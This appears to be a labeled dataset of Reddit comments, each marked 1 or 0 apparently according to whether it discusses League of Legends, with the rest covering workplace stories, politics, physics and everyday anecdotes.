1	I think that if it was money, they wouldn't have gone twice to Korea to begin with. Even if they came first in the OGN tournament, they would have probably lost more or earn too little compared to what's been spend.   Basically what HotshotGG said on his stream a couple of days ago was that apparently TSM/SoloMid gains too much of a profit/gets practically everything out of the tournament and that you don't really get much out of it if you don't come first and it'll probably be TSM who gets first place. The fact that you're not allowed to stream any important games probably makes the players lose a lot of money they would have gotten from the stream. I believe that's the most of what he said, may have forgotten one or two things, can't remember if anything else has been said.   Also, since I'm seeing a lot of hate towards CLG on a TSM thread without any argument, I'll tell some people who think that Dignitas/Curse and other teams really wants to participate in every tournaments. That's how business works : You sell your brand, in this case, the name of the team. Now you guys are saying things like "Dignitas and Curse said that they didn't like the tournament, didn't want to participate anymore and still are participating in it" but that's not totally true. As I said earlier, an organisation is selling their brand, to gain more popularity, more sponsors and everything that comes with those two. The reason that CLG does not participate in this tournament is that their organisation is basically ruled by their LoL team (CLG.Prime/NA), what this means is that if CLG.Prime/NA does not wants to participate in a tournament, they simply don't do it. But that is not the case with bigger organisations. Let's be honest here, if you ran an organisation that big, and want to be even bigger, what would you do ? Make publicity, participate in things, try to get more sponsors, more popularity (Both are done by playing in tournaments, be it known or not), etc etc. And that's exacly what the Curse/Dignitas and other "big" organisations are doing, they are sending out their players to play in tournaments to spread their name and try to get all that is listed above.
0	Most companies use 3rd party gallery systems to display images on their sites.   These gallery systems are designed to provide the most functionality, but at the same time not be so complex that the user experience is impacted.   The main reason they leave the functionality in place, even if an image is smaller than the 'expanded' version, is consistency.  Users expect consistency throughout any application they use.  If an icon is used in multiple places, the user expects that the functionality the icon represents will be exactly the same in every situation.   By disabling a click-through interface in situations where the image is too small, you are now introducing a level of inconsistency that many (I'd go as far as to say most) users will not understand.   The average user sees that clicking a thumbnail brings up a larger version of the image.  They expect that this functionality holds true any time an image in that gallery is clicked.  When something doesn't happen, the first thought is that it's slow to respond, so they try a few more times.  The next thought is that something is broken.   From a development perspective, it's up to the administrator or content manager of the site to use appropriately sized images so that this functionality always works the way people expect.  When a small image is used, and pops up the same size in the 'expanded' version, it's because the content is wrong (again this is from a programming perspective).   Developers would say it's not worth the time an effort to implement checks for every image to determine if there should be an expanded version shown or not.  This is an 'outlier' case, and the implementation to resolve it can get very complex.  Do you put up a message indicating why there is no expanded version?  Do you leave it with no message and let the end users potentially think it's broken?   Many of these products have options for storing images on a remote server (cloud-based, etc.) instead of locally on the server.  This is especially useful for smaller sites with user provided content and limited storage space.  If, after an upload the images never change, then the metadata for the image (width, height, color depth, etc.) can be stored in a database and retrieved easily.  This would provide an avenue for checking sizes and not showing the option for an expanded image if it is too small.   If, however, the images can change, there is potential for that data to be out of sync.  Depending on how often it changes, and how often synchronization occurs, it could cause inconsistent results. You can increase the polling times to address synchronization issues, but that also increases overhead, and in the case of cloud hosting, cost.   The other option is to download the image and analyze it before rendering the whole page.  You can download the large version of the image and confirm if it is above a given size.  However, this can significantly slow down page loads if there are lots of images, or if the images are stored remotely and connectivity is slow.
0	I think it has a lot to do with group thought, and that you say you aren't on team vagina they think it somehow hurts the movement I honestly don't get why marginalized group from both genders MRAs and WRA argue on the internet, shouldn't they be working together to make a society a better place? I certainly don't feel comfortable in our society and feel intensely marginalized by it to the point where I can't have a anything close to a normal or happy life so how is my pain any less real?  its the happy people who don't question the network of our society, happy people aren't going to sit and think about the ways society oppresses them because it doesn't. I don't get how I can even offend feminists the one thing I desperately seek to do with my life is to make the world a better place for the people within it thats literally my only dream and I don't know how I can do it or even contribute to it. and, I don't even care if I would get credit for it, but I can't I"m just a broken person that doesn't fit in our society it seems. “From day one it was like society was this violent, complicated dance and everybody had taken lessons but me. Knocked to the floor again, climbing to my feet each time, bloody and humiliated. Always met with disapproving faces, waiting for me to leave so I'd stop fucking up the party.   The wanted to push me outside, where the freaks huddled in the cold. Out there with the misfits, the broken, the glazed-eye types who can only watch as the normals enjoy their shiny new cars and careers and marriages and vacations with the kids.   The freaks spend their lives shambling around, wondering how they got left out, mumbling about conspiracy theories and bigfoot sightings. Their encounters with the world are marked by awkward conversations and stifled laughter, hidden smirks and rolled eyes. And worst of all, pity.” -david wong. Edit:Thanks for reading at least self catharsis is useful at times it makes me feel much better. Sorry if i bothers you but it allows me to vent my emotions and release any tension within my mind.
1	back' as in 'bring something back home' its not saying it was here, left, now bring it back. the returning part of back is not returning the cup, but as the team returns, they bring the cup with them.
1	he has not corrected his behavior from previous times he has broken the summoners code and put "on trial" for breaking his "parole".   How do you know he "didnt correct his behaviour"? In that case, he disconnected from a game for 15 MINUTES, a 15 minutes disconnect = permaban?   It could be for any reason, his family having urgent issues, his computer dying, whatsoever   >
0	I always took "look at all the fucks I give" to refer to someone not being bothered by criticism - that they give so few fucks that they're as happy and carefree as Julie Andrews as she barrels across the Alps, singing as she goes   Makes more sense than the idea that she's gesturing to the empty space around her (which she isn't, she's just flailing around while she sings about hills and sounds and music) tbh. I mean, can you even  see  a given fuck? Julie Andrews could be completely surrounded by invisible fuck-givings for all we know (brb, pitching an idea to an Austrian porn producer)
0	I live in Belgium (if you have a couple hours to burn, look up our political history, it's too complicated to get into here), and a multi party system isn't all it's cracked up to be. It implies two or more parties will have to compromise to come to a governing agreement. So, they cut part of their program to get to an agreement, then in effect they can only get part of that turned into legislation. So whichever party you vote for will only execute a small part of their program. Also, if you then decide to switch parties, it doesn't really matter. The three largest usually form a coalition anyway, so either you're validating the current coalition (even though you switch parties), or you're voting for a party that's too small to weigh on policy. I would welcome a two party system, so your vote sends a clear message: I think this guy is better than than guy. Anything more complicated than that, and politicians will find a way to spin it so it suits their story.
1	Well, in every elo u have to learn some things to rise ur elo up, try to learn counters, to improve ur last hit, read guides, try to understand the meta game, EVERY time, no matter i u r support,adc,jungler,top,mid, EVERY time u back, buy a ward, wards save lifes, wards prevent u and ur team for ganking, make u improve ur map awareness, watch streams, they help a lot.
1	I had 17000 and then bought 3 tier 3 runes and Kassadin few hours ago. I have before that only bought 3 or 4 champions and a minimum of runes..
1	Top - usually tanks (Gnar, Maokai) or AP mage (Lissandra, Rumble)   Jungle - either earlygame based jungler, that snowballs other lanes with his huge damage earlygame (Lee Sin, Rek Sai) or utility tank (Sejuani, Zac) that shines in lategame.   Mid - mostly AP sustain damage (Orianna, Ziggs) or AP burst mages (Annie, Viktor etc.) or assassins (Zed, Katarina, LeBlanc). Most of mids stay by their supports and marksmans to peel each other, but assassins need to damage enemy backline.   ADC - physical damage carries, super squishy but he's main source of damage (Lucian, Graves, Caitlyn)   Support - adc's support (Thresh, Janna, Nami). He controls vision and makes plays by catching enemies, by engaging teamfights etc.   I'm mid main so I can tell you that mid is mostly about outfarming, outplaying (killing) and outroaming your opponent. The best champions right now are: Zed, Xerath, Ahri, LeBlanc, Viktor, Katarina, Annie (random order)   Laning phase takes place from start to about 10 or 20 minutes (really depends on how lanes are going and roaming). After that teams should be focused on taking objectives (Towers, Dragons, Baron;   Towers give map control and global gold,   Dragons give permament stacks, that gives you combat/movement/pushing stats (taking dragons is really good, because it pays off in lategame), but give no gold.   Baron gives same gold as 2 towers to everyone on team and gives a buff to everyone on team that gives you 40ap/40ad and faster recalling (4sec instead of 8sec) AND aura that makes your minions faster and stronger, but only when someone with baron buff is in range.
0	they also actually teach you important ideas about the way the world works. if you even pay the slightest bit of attention, HS calculus and physics should at least get you derivatives, kinematics, energy and momentum, and simple circuits, which,  even if you don't use them in your line of work , are important in terms of how you think about the world.   it's difficult for me to imagine a time when i didn't really get how acceleration, velocity, energy, and momentum were related, but prior to junior physics, I didn't. now i have an intuitive grasp about all of those concepts, and even though i might forget the specifics (e.g. KE = 1/2mv^2), i'll understand how moving bodies behave in a way i wouldn't have before.   i also know what voltages and currents and resistances mean; i can tell that putting my hands on the terminals of a 12V car battery is  not going to hurt me  (due to electricity; i might get some corrosion/acid on my skin) even though it's a huge battery with enough stored energy to spin my engine up, and even though jumper cables make huge sparks when they short.   i can combine these concepts too: since i understand that the mAh marking on a battery is in units of charge, i can multiply by the battery's voltage to find the energy in the cell. now say i'm looking at a kid's toy and i want to see how long it'll last. okay, the thing takes 4 100J cells, it weighs about half a pound (~ .25 kg), and it moves at about 1m/s. KE = 1/2mv^2, so it's using 1/2*.25*1 = 0.125J per second, meaning it should last  at best  3200s.   say we take my phone: when it gets warm it means it's  using more energy : that heat has to come from somewhere, and that somewhere is the battery. people get so surprised when their phones die seemingly at random, but you can tell that it's draining quickly if it feels warm in your hand.   i could keep going with things i'm learning now in college (i'm not a physics major, but i'm taking an introductory course to relativistic and quantum physics because a) i think it's interesting and b) it helps me understand the world) but they're a little less applicable, so i'll only give one example.   say you put two wires parallel to each other and run current through them in the same direction. they're attracted to each other classically by a magnetic force (if you work through the right hand rule it works out). relativistically, in a reference frame stationary with reference to the wires, the same thing happens, but if you pick a reference frame that's moving with the same velocity as the electrons, you find an interesting phenomenon: due to length contraction, the distance between protons in both wires decreases, and the distance between electrons increases, so both wires are positively charged. there's no magnetic force because the electrons are stationary in this frame, but as both wires are net positive, the electrons in each wire are attracted to the other. (this is more just an example of how i think science is cool, but that's an argument for paying attention and learning too: once you learn the simple stuff, you get to experience the parts of science that are really interesting and fun.)
0	Real story:   I work as a bartender in a chain restaurant. Whenever we are slow, the servers come hang out where they pick up their drinks. One day, coworker comes up and starts talking about her two kids. She's maybe 23. I say wow, how is it you have two kids. Expecting something like "oh I married young," or something similar. No. She tells me, and I quote, "you know how they say if the girl's on top, you can't get pregnant? That was the first. The second was prayer." I couldn't stop laughing.
0	I worked with a girl who called in for a week after her mom had "passed away". We'll call her "Nichole."  Well, were all broken up about the whole thing, thinking about our own mothers, and we gave her tons of support. She had a history of being a bit of a fibber, but nobody thought she (or anyone) would lie about such a thing. Another girl I worked with was suspicious right off the bat, having worked with Nichole and her BS for longer than I have, which I thought was rather harsh.  Fast forward a month or two. While both girls were working and Nichole was on her lunch, we get a phone call for Nichole. And guess who it was? Her mother. So we just took a message, like we would any call.  We thought what a fucked up joke to play on someone. So we checked the number against the emergency contact information and confirmed that it was indeed her mom who had called. When confronted with her bullshit she flipped out on us yelling and all that. " Who could do such a thing!?" She says. Needless to say Nichole was sacked by Monday.
0	Buy a starter book and learn 1 language. Seriously, buy a book. You can't imagine how good a book is for the starters.   I tried python alone and was really struggling. Then I started a class in university about c programming and everything is a lot easier.   You need someone, a person or a book, to tell you the basics that you have to write without understanding it.   In order to complete  your first program such as "Hello World" you need to type a lot of stuff that is not relevant to what you are learning.   For example in C language.   include <stdio.h>   int main(void)   {   printf("Hello World");   return 0;   }   This is example of what I am talking about. Everything except printf("Hello World"); is not relevant to the beginer. You just type that until you start doing harder things.
0	i find it's older people that say these things. too ignorant to let go of the past. or as some thing of it, the good ol days. i saw a story a couple days ago about a man in missouri that grabbed his waitresses arm (she was black and he was white) and told her he wanted to take her where he hung her grandpa. seriously what kind of sick fuck to you have to be to do something like that.
1	I made a similar post. Was the first post I made actually. I watched one video called "Why elo hell doesn't exist" and in that video it said "there was a pro DOTA player that said 'I was actually really bad 3 months ago. So one day after I lost a match I said to myself. "I suck in this area this area and this area" I then proceeded to move up in ranking." Now I know why you may think it exists but it honestly doesn't. I have a current elo of 897 and currently bringing it higher.
1	Why does everything have to be puppy dogs and roses?  Why is it that anything spoken or written should be positive and if its negative it shouldn't exist or not be the popular opinion.  You are trying to call out specific groups or people again "to cowardly to be jerks in real life", actually I am pretty sure there is still a large amount of douchebags that are so online and offline.  I can be vocal about my opinion, and don't care about other criticizing me, in fact I welcome it, but not because I live my life based on other people valuing me, but it intrigues me.   If you are wearing something outside, dress, shoes, or anything that you like you are "showing" it off, people are judging it because you put it out there to be.   If you only wear things out based on what you like and don't care what others think?  Then the same should be about your physical appearance and then we wouldn't be having this argument.   Everyone is open for judgement, like it or not, and everything is judged from top to bottom.  Men as a whole look for perfection, their DNA tells them to do it, society tells them to do it, women buying INTO it reinforces it.   You think differently then a man, and we think differently from you.  Those "ugly" men out there on forums that get made fun of are made fun of by MEN, a very small amount of women would step out and openly insult him he would be that "nice guy".  There are traits that we require, want, or let slide by who we choose, women are often judged by men on a multiple point score, we often do it subconsciously so we are often the biggest critics.   Does it make sense? Eh   Does it suck? Yep   Does life go on? Yep
1	haha not many, i'm a support main but I don't play her all that often, especially recently.  The best advice i could give for her though would be to really REALLY practice your positioning. She relies a lot on harass with autos/plants/q then uses e to disengage so you have to make sure you are in a safe position to dodge skillshots.  Hold your e as long as you can to stop ganks and only use it when your sure you can connect with it.  Once you get better at aiming it and timing it, you can start to use it to engage for better harass from farther away but when you start, it can be difficult to land reliably and the cooldown is so long, you can be punished hard while its down.   Goodluck!
0	Thats the way it's got to be unfortunately. The emotions will overcome you when you slow down or start remembering what you are trying to forget. The key is actually to stop worrying about what she may think about any of it. Life's about you now, not about her. As hard as it is to do, (and as good as it might feel to ensure she knows she fucked up) the only way to truly remove the pain is to stop caring about what she thinks. There is however something to be said for the "fake it until you make it" method you are attempting. Smiling more can lead to happier thoughts etc. The part I disagree with is the reasoning behind your use of this method. It can't be only because you want her to regret dumping you.   As great as it might feel to have vindication and to "gain the upper hand" as it were, the best revenge anyone can ever gain is really simple. Live a good and happy life, minus her. But you must not worry about whether she will be upset, or how she'll react, or whether she'll regret it, because when you live life for yourself - it stops being about her. Her regret will come, but only if you don't care about making her feel that emotion. (I worry that you might not understand what I mean by this, so let me know if this is confusing.)   I suppose my point is really that if you want to feel better, you've got to at first fake the happiness, and ignore the pain through other activities. And later on, you will begin to smile for real because you've stopped caring about how any of this affects her. Being single is more about living life for yourself (even in a relationship it's important to ensure you are happy).   Anyway that went a bit longer than I meant it to...
1	This is the 1000th time I've seen a post like this. Whenever posts like this get a lot of attention, a rioter generally posts why OP got banned and ta-da, it's all over. With perma-ban cases, I'm pretty sure Riot has stated that they don't just use an automated system, but rather they check it out in person. Whether you got banned for the tournament situation or account trading, you deserved it. You don't get special treatment just because you were a diamond player w/85 skins--why bother telling us those details?
0	Story time. I used to work Ravens games and used to hang out in the security office.  One game we get a call that this dude lost his cell phone. We check the lost and found and nothing was returned. Same guy calls ten minutes later saying some guy found the phone and is demanding $200 for it and wants to make the exchange at some set place and time. Three Baltimore police officers, surely there to just to watch the game, stand up and march out of the office. Poor guy probably got his ass handed to before going to central lockup.
1	I hate you, pilo :I   Because of you I had to deal with an AP Tryn who stole top from our top lane, forcing our top Jayce to go mid, while my original intentions were to go mid; in the end forcing me to support.   Not to mention he went AP Tryn against Darius, without telling us about his little build.   He only did this build because he read this thread
1	If you want to increase Elo you do need to dominate your lane on average.  If you aren't winning your lane 70% of the time your elo will stop increasing.  Your strategy is basically to tread water and get carried.  Removing you from the equation just means that against good opponents and with good teammates there is one less person on your team effectively trying to win the game than there is on the other team.
1	Hey greg, I love your videos. But I'm confused on the part about duo queue.  When I hear someone mention that they're duo queue I think they are ADC and support, this is the only time I even mention that I am in duo queue, because I can communicate with my lane partner without typing. Are you criticizing people doing this? Or do duo queues Try to snag solo lanes based on the fact that they're in a skype call?
1	Support is a function I believe, not necessarily a role. Currently we are designating the second person in the bottom lane as "support" but really, an Orianna mid is often just as much a support as an Annie or Morgana "support".   I say that support is a function, because you are intended to do just that, support. Thresh is super strong because he can peel for days and create opportunities for the team. He is supporting the team. The same applies to an Orianna or Lulu (or whatever support mage) in the mid lane. Orianna hits that ultimate and creates an opportunity for her team to make huge plays, much like a tibbers, binding, or crescendo.   Carries as a function deal massive damage. The ADC (or marksman now) is solely responsible for dealing massive damage. However, some marksmen are supports (Ashe for example). She provides massive opportunities for her team with the Enchanted Crystal Arrow.   My point here is that the labels we have assigned to these champions or positions are not necessarily all encompassing, and should be evaluated on a case by case basis.
0	It sets a precedence.  I'm a 6'8" 240 pound basketball player, I don't think there are many women on earth who could beat me up.  However, if any girlfriend or significant other hit me, or attempted to harm me, that puts me in a horrible spot.  Even though there are very few women who could probably beat me up, probably 99.999% of them could easily inflict pain on me if they truly wanted to.   Let's say that my SO attempts to hurt me, but she doesn't inflict any pain and I just take it.  What will happen next time?  Well, being that she set out to cause me pain and failed, if she is truly attempting to hurt me, she will obviously try something more slightly more painful.  I have already set a precedence that she can attempt to hurt me and I will simply take it.  So, as you can see, this becomes a cycle that culminates to the point where my SO is now causing me actual pain.   Don't get me wrong, I'm not advocating for men to deliver haymakers to their SO's when they get playfully slapped.  All I'm saying is that if a person comes at me trying to inflict actual damage, their gender plays no role in my decision making in how to act.
1	I have a feeling that if they lose he will accept and eat crow without much back pedaling. It sounds like he is making a team culture that accepts responsibility for underperforming while also actually using losses/criticism/feedback to grow. From a fan perspective CLG are notorious for not implementing any obvious changes when they do poorly, but Dexter sounds like he's getting them to act on improvements for more than just the two days after losing to a lower tier team.
1	With all respect, that is a terrible idea. In my 1500+ games I only witnessed a similar situation once or twice. Also people with bad connection would spam this while the problem is with them. Don't you think this is too specific to make a whole report function for?
0	Hey you're the one who signaled your preference for insults, so I don't know why you're surprised.   On the note of the job. I worked retail in highschool, I have a better paying job now in college so I'm glad I don't have to work with self-righteous dicks like you.   The point is that in the described situation the customer made a joke wherein a fresh bill was jokingly referred to as "just printed".  Your reaction would be to refuse service to this patron for simply saying something in a unassuming and friendly fashion in a fit of apparently unacceptable dry humor.   Now you claim to work for an establishment that values its customers so little that such a petty action on part of an easily replaceable employee is met with the manager simply joining in on your holy chorus.  That sounds like BS because even the nicest manager would check the bill realize it was a joke and then apologize to the customer.
1	When i usaly go cassiopeia i will open with my boots and 2 doran's rings. I got mp5 per lvl runes also. But i don't get THAT oom. And by the time i got those items, i have gotten blue buff. What you need to do is conserve your mana and don't spam all to much. Hit them with your Q and then 1 or 2 E and then go back to farming with your auto attacks. Thats how i hold my mana up pretty high and how i can survive till the second blue.   And 2 doran's rings is a good starter. And you still get that burst and ap wich you need. I feel like as soon as i go level 6 i will be scary.   This might not awnser your questin though, but i think ryze will need some sort of minor buff or change? I also would consider that every energy guy needs some sort of minor buff to the energy itself. I know that they shouldn't be as much as a mana champ but they never get OOE (out of energy). But mayby minor the regen of the energy a bit. This will get an nerf to every energy based champ though (lee sen, shen, akali and kennen).   Lee Sin is realy strong now so i would see it happening to him and he might get a bit nerfed mayby it's enough or not i don't know.   Shen has been a strong pick for a long time now. I would consider the energy nerf would be good on him also. Instead of just spamming his skills out like an Cooldown based champ (katarina) Wich can just spam out the skills asap. Then shen would be like "hmm, the teamfight is about to start, should i do my taunt and then tele to an ally or should i taunt and then shield myself? or should i taunt and Q someone?" I think it would be just about perfect.   Kennen will be about right, laning phase he can just spam out his Q all the time and harass (even if it get's nerfed). But the teamfights will be changed just as shen.   Akali, i myself have not so much experience with akali but when i have played her i can't realy spam my Q alot but they could fix it with lowering the Q energy cost or something.   Thoose are just my 2cents.
1	I hit level 30 and startet playing a bit of Ranked in Season 3 and ended up being placed in Silver 3 and went straight to Gold 5 from there in like 30 Games.
1	Morde is just a bad champion. I would rather have any other AP champion. Morde is forced to push, just by the way his abilities work. Accidentally or otherwise, he will inadvertently push his lane, making him very vulnerable to ganks. He can farm up a storm, but he will leave himself so open only a foolish team would let him free farm without ganking. He is also forced to use his abilities on minion waves just because without his shield, and considering his abilities take his HP, he will be outharassed by many other champions with just his auto-attack.   He also has no CC. The lack of CC or slow, or any escape mechanism makes him a very bad AP champion compared to other AP champions. The only way to do well with him, if the enemy team is decent, is for him to ghost the enemy's AD carry, and use it to destroy the opponents. However, a QSS or cleanse grab will easily cancel this, and make Morde a spambot, albeit a tanky spambot.   Look at your CS as well. You notice, that Morde needs an incredible farm to get good enough items to pose a serious threat to the enemy. Otherwise, he will be weak and ineffective. But, as mentioned, when he farms, he forces himself to push and push, and open to a lot of ganks. Even worse, though, he will need to farm for 20-30 minutes for the start of the game to hold his own mid-late game. Other champions that require such a farm, like Nasus or Irelia, can hold their own without a huge farm, and slowly farm up through the game. Plus, both of these champions have slows/stuns.
0	To my understanding propaganda is any portrayal  of information that doesn't show both perspectives. In Canada the media is obligated to show more then one stance in order for the general public to make an informed decision on issues. For example if on talk radio there is a liberal minded host on for a couple hours that station will then have to put on a conservative minded host for a couple hours.     Propaganda isn't inherently evil but it is however a form of brain washing when the government only allows the public to have information from the view point that you want them to have.     I am aware that in this day and age it is easy to check facts. Unfortunately it is up to the individual to do so and if your news programming shoves something down you throat constantly it is easier for you just to take it at face value. It is the news after all, right? They wouldn't lie and present opinion as facts, right? That right there is the problem. When propaganda becomes predominant the sources you used to trust for factual coverage can now give inaccurate depictions and the change from one to the other happens without anyone noticing.     Just think how many of your friends and family have been fooled by the onion before, and that's an openly satirical website. Not everyone is as skeptical as I know redditors a can be. Its not you whose opinion they change, it's your mom or your little brothers or your grandparents.
1	The type of damage that commonly affects wrists and stuff in the hand (especially from the type of usage he gives them constantly every single day both on and off screen) can last for a very long time and be very painful. It is such a complex and delicate are of the body; there are so many bones, tendons, muscles, and joints in the hand that we use to the point if breaking while doing the things he does that it's just not the same type of recovery as legs. My dad doesn't even play video games but his work has him on just computer constantly, even at home, and paired with his macular degeneration he uses a lot more movement than most so he has to take pain, swelling, and uric acid reducing medication daily just to keep working. He's had surgery and physical therapy but it just doesn't go away. He felt it through his entire last vacation which was 4 months long. I'll be he will feel it till the day he dies. Hai uses more complex and specific movement more often and more stressfully than my father and I'm sure he will be feeling the effects for years and years, which may require surgery and may never completely go away.
1	I'd agree that patience is important, you need to know when you can go in on something and when you can't and be really careful about forcing things, it's the reason average kills go down as ELO goes up because more players understand this.   I'd say another important piece that players fail to do is respect a champions capabilities. For example my level 5 jungle comes to gank mid with half health and gets blown to bits by the enemy level 7 Syndra and then types "wow" - is this the first time you've played League or something? You had no business jumping in on her. Complete lack of respect and insists on forcing a play at terrible times. It drives me nuts because like you I'm also Platinum and while I don't consider Plat "good" by Diamond/Master/Challenger standards it's still the top 7% of players and I expect better of them.   End rant? :P
0	So what you're saying is that you're expecting a reward?](  [You're not "friendly" because you want them to be your friend.](  [You're "friendly" because you expect them to fuck you in return.](   [Do you also expect your guy friends to fondle your balls in return for being their friend?](   >["and it doesn't really feel like they view you as a person. just some sort of source for them to have someone to talk to."](   [It means that they view you as a "friend", a concept you're obviously not familiar with.](   [
0	No, neither one is good nor bad.  When you invest, you are purchasing.  You are buying a possibility.  For the first case, the value(in the mind of the investor) of that possibility to anyone who makes the investment is greater than what they pay (the ten dollars). [this is also affected by the possibility of each possible future happening]   The second case is exactly the same.  A person makes a purchase of a possibility that they are going to make money.  The difference being that in our example the ROI in the banker case is money not a good(the finish product)   The investor in both cases must make a choice.{for simplicity i am going to leave out some variables such as inherent cost as well as some of the more complicated parts of the math assuming a variety of possible futures}  Does the purchase that i am making follow this equation PP<FV*PF?  If the initial purchase price(the invested amount) is less than the subjective future value times the probability that that future occurs, than the investor should make the purchase.   The only thing that could be said about either case of investment is not that one is good or bad, but it is possible that one is foolish.  But anyone who makes any investment should evaluate the value of the return, and decide whether it is likely to happen.  What one might also say, is that the banker example has individuals more attune to the calculations that i have barely discussed, so by using kickstarter people are taking advantage of altruism.   However i want to make it clear, if someone wants to claim that kickstarter takes advantage of altruism over good business sense, then I see no reason why that couldn't be true for more than just movies.   This was a long response, and i think the
0	THIS  I don't care the people defending HR further down. You can have the best relationship with HR in the world until you step on the wrong toe, then they turn on you like feral hounds. HR IS NOT YOUR FRIEND.   Personal experience: 2010: I used to work at one of the first Credit Unions in the USA, and had an excellent interview with HR. 2 months into the job, I went to my boss to tell him my National Guard unit was gearing up for deployment to Iraq. I did not have orders at that time, and was just giving a courtesy heads up.  Several days later, I am pulled into HR where the woman who hired me is furious, and flatly states that I lied during the employment process when she asked if I was deploying in the future (I had said 'not that I am aware of'), and that after this meeting she will look into my future with the company and get back to me on monday. I was largely silent during this, as I was confused by her adamancy towards my wrong-doing.   A week later, I am performing a network drive scan to delete unneeded files, as employees are complaining of a full network drive (weekly issue, because disk space is expensive for a bank. Or something.) I find a document with my name on a networked folder on this drive, and open it in curiosity. It is the write up of HR's meeting with me, and details that afterwards the woman spoke with the law firm that represents this company to discuss my termination. They advised her to back the fuck off and never mention it again.   Naturally I did not hear back from her on Monday. A month goes by, and at this time I have completed creating the procedure manual for my position (new position), have numerous customer and employee positive surveys, have worked at least 10 minutes before and after 90% of my shifts (encouraged), never been late - but am given a negative performance review for my 90 day initial review. My boss states that he wanted to give positive, but HR insisted it be negative due to a minor server outage I caused during my third week at the company. At this point, I informed my boss about the contentious meeting I had with HR. He states he will look into it. I then, against my better judgement, mentioned the file I had found. I did not provide a copy of this file.   The next day, after morning operations are completed, I am escorted from the building and provided my belongings, and terminated. I am accused of violating company policy by unauthorized network access. The company tries to deny my unemployment, but I successfully defeat them through arbitration as there is no actual policy against this, and I was under the understanding that cleaning network drives was part of my job.   I never pursued USERRA action against the company, and felt ok about that until I learned this woman was made director of HR for the credit union.
0	I've seen a lot of sick shit here on Reddit, but yesterday was the first time I shut off a video within the first few seconds.  Other people in the comments were saying the same thing.  The title of the post was Guys find and rescue a cat that was left to die.  It was posted in /r/videos.  The tag said NSFW, but it should've said NSFL too.  Anyhow the first few seconds are so heartbreaking I had to shut it off, especially after finding out the post title was misleading and the cat dies after a few days.  I was going to post the link, but I don't want to scar anyone else's brains so they can look it up themselves.  I'm actually still disturbed by it today.
1	The idea is that you're already walking towards them. Think of it like this:   You're at 1000 range, moving towards a champ to auto attack them. Instead of right clicking on them, you cast condemn. Either of those options makes Vayne walk towards the enemy champ.  But with condemn cast, if they flash or shen taunt or nidalee pounce into your 550 range, they'll get condemned away.  The trick is right clicking on them right before you reach the 550 range so that your condemn doesn't go off if they didn't try to gap close.
1	Hey there, mid/high plat player here. I am a support main. I agree with most of this it does help to mute and focus on the game. As far as talking goes its not that big of a deal, its really the very negative sort of attitude that really seems to bring teams down. When you see allot of unwarranted negativity coming from a player especially its time to mute them. In other cases its at your discretion.   Your
0	airplane flight post it to reddit. Get of of plane maddness get to hotel bone for days.
1	I actually rather like the patch as a whole. Yes there were Kass mains who are unhappy with where he is now but the problem was, Kass is an assassin who typically reward high skill with the champion with high, well, rewards. Where he was, Kass was a strong pick in either top or mid, playing either bruiser or burst, against both AD and AP. The changes put him into a place where not just any Joe Schmo can pick him up and wreck your general game.   The jungle changes, while maybe a little heavy handed are well intentioned and most people are basing their arguments that champions who can only clear three camps before needing to back are being pushed out by the price changes. I have one answer for you, Scuttle Crab. Take your first camp, take your buff and move to Scuttle, you take no damage and thanks to Machete passive, you gain life and mana on top of your passive regen. Just give people time to adjust and the jungle diversity will return.   As far as Veigar is concerned, I expect these changes will make more sense when the new +120 AP item is finally released. We are only seeing the beginnings of Riot's plans for the game with the removal of DFG and I expect the next few patches will fix a lot of the problems with Veigar that we currently see.   And now what /u/zanash pointed out, I LOVE the new Zilean, he feels rewarding to play as a support and he is a blast (pun intended) to play mid. I think Riot really hit the nail on the head with Zilean's rework.
0	There's a few things going on. There is obviously the censorship, but more damaging is how sex is viewed as a society in Japan. Obviously not everyone views it the same way, but the majority view sex as something that only men enjoy and the woman is there to "service" his needs and desires. It is most noticeable in how the women behave during sex.   Now I have not gone about having sex with multiple Japanese women to know this, but having read articles, forums, and other media discussing the topic, the gist of it is that women largely just lay there and are as quiet as possible, letting the man do his thing and then it is over. (This is the general behavior during sex in Japan)   Add in pressure from family members and society to get married at a relatively young age. Once again from the same source materials, this age is usually after they finish the schooling they plan on doing. So if they decide to stop after the equivalent of US High School, there is pressure to get a job and then married. If they attend college/university, it is after that they are expected to be married.
1	You should probably know that the reddit trolls are now legally contracted to just downvote your post while spamming the comment section with things like '
1	Runes and champions are incredibly costly. Assuming that each champion you want costs an average of 4800 (and you want about 10 champs, two for each role) and you want 2 sets of all four types of runes (for this we will just be assuming you want flat MR blues as your only glyphs, because they are pretty standard, and we will also be assuming prices using the active sale) you would have to spend 64,752 IP. This amount of IP is equivalent to 498 WINS with first win of the day mixed in every once in a while to make it a little more "fair". Keep in mind that this is also assuming the current, TEMPORARY rune sale that is going on right now.   This is pretty unacceptable as far as the time in which it takes to get to a point where you can even attempt to play at the highest level. I have always had issues with the amount of time dedication this game takes compared to other MOBAs, as I have always believed that your ability to play a MOBA should be given to you through skill and not grind. If I wanted to play a game to grind for 36 hours straight so that I could play at the proper level, I would have stuck with Maplestory or Vindictus.   I have allocated a quite a bit of MMR on my main account and I got every champion except Quinn (because she is the worst), so I made a second account to play with friends who were newer to the game. I found that it is reallly hard to get champions that you want if you aren't willing/can't dedicate RP to the game. Alot of the newer champs or 3150 champs are favorable right now, so it is really hard to get the stronger/more popular champs.   I think that the solution to this is Riot introducing IP bonuses for win streaks, first wins for all game modes, reintroducing Tribunal rewards, revamping the referral system, lowering the costs of champions much more quickly, having IP events (I will talk about this later), having IP bonus giveaways and there are many more ways that Riot can introduce a much higher quality way of IP distribution that I am probably not even considering.   I think that if a company is going to treat their MOBA in a way that MMOs are generally monetized by, they also need to have the same events that MMOs host as well. Riot has expressed distaste to IP events in the past, but there are ways that LoLKing has done giveaways that give me hope that they can be done in a flavor manner that is conducive to the environment. Make daily or weekly objectives through champions played or items built that can donate towards additional IP rewards. I do not want to advertise the LoLKing giveaways directly, so if you are interested in how these work you can just check those out through Google or whatever.
1	Believe it or not, I feel like this contract is pretty much as standard as you can get for a contract to play in a league monopolized by one company.   Riot isn't out to shoot itself in the foot. It reminds me of the old Hollywood houses owning actors with indentured contracts. If you are the only game in town, you can write the rules.   This is not to say that they are evil. They are a company after all, not a commune. However...
